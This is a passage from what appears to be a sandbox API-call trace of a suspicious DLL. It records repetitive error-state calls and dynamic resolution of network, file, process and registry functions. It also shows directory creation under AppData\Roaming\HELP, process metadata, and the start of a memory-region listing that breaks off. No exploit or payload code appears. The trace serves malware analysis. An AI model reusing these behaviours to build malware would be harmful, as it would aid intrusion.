(dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.381] SetLastError (dwErrCode=0x0) [0034.381] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.382] SetLastError (dwErrCode=0x0) [0034.382] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.383] GetLastError () returned 0x0 [0034.383] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.384] GetLastError () returned 0x0 [0034.384] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.385] SetLastError (dwErrCode=0x0) [0034.385] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.386] SetLastError (dwErrCode=0x0) [0034.386] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.387] GetLastError () returned 0x0 [0034.387] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.388] SetLastError (dwErrCode=0x0) [0034.388] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.389] SetLastError (dwErrCode=0x0) [0034.389] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.390] GetLastError () returned 0x0 [0034.390] SetLastError (dwErrCode=0x0) [0034.391] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0034.391] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0034.391] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0034.392] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f990 | out: lpSystemTimeAsFileTime=0x20f990*(dwLowDateTime=0xe22edef0, dwHighDateTime=0x1d3dfba)) [0034.392] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20f8c8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.392] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x20f7b0, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.392] GetLastError () returned 0x0 [0034.392] GetLastError () returned 0x0 [0034.392] GetLastError () returned 0x0 [0034.392] GetLastError () returned 0x0 [0034.392] GetLastError () returned 0x0 [0034.392] GetLastError () returned 0x0 [0034.392] GetLastError () returned 0x0 [0034.392] GetLastError () returned 0x0 [0034.392] GetLastError () returned 0x0 [0034.393] GetLastError () returned 0x0 [0034.393] GetLastError () returned 0x0 [0034.393] GetLastError () returned 0x0 [0034.393] GetLastError () returned 0x0 [0034.393] GetLastError () returned 0x0 [0034.393] GetLastError () returned 0x0 [0034.393] GetLastError () returned 0x0 [0034.393] GetLastError () returned 0x0 [0034.393] GetLastError () returned 0x0 [0034.393] GetLastError () returned 0x0 [0034.393] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.393] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0034.393] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.393] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.393] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0034.393] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.393] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0034.393] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0034.393] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0034.393] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0034.393] GetLastError () returned 0xb7 [0034.393] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0034.393] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0034.393] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0034.393] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0034.394] wsprintfA (in: param_1=0x20f630, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.394] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0034.394] wsprintfA (in: param_1=0x20f52c, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.394] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.394] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0034.394] CloseHandle (hObject=0x74) returned 1 [0034.394] GetLastError () returned 0x0 [0034.394] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0034.394] GetLastError () returned 0x0 [0034.394] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0034.394] GetSystemDirectoryA (in: lpBuffer=0x20f630, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.394] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.394] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0034.394] CloseHandle (hObject=0x74) returned 1 [0034.394] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.395] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.395] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0034.396] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.396] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0034.397] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0034.397] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0034.397] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0034.397] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0034.397] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0034.397] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0034.397] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0034.397] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0034.397] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0034.398] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0034.399] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0034.399] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0034.400] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0034.400] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0034.400] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0034.400] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0034.401] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0034.401] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0034.401] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0034.401] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0034.401] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0034.401] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.401] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.401] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.401] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0034.403] HeapDestroy (hHeap=0xe0000) returned 1 Process: id = "45" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb60" os_pid = "0xc98" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllGetClassObject /fn_args=\"127.0.0.1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2011 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2012 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2013 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2014 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 2015 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2016 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2017 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2018 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2019 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 2020 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2021 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2022 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2023 start_va = 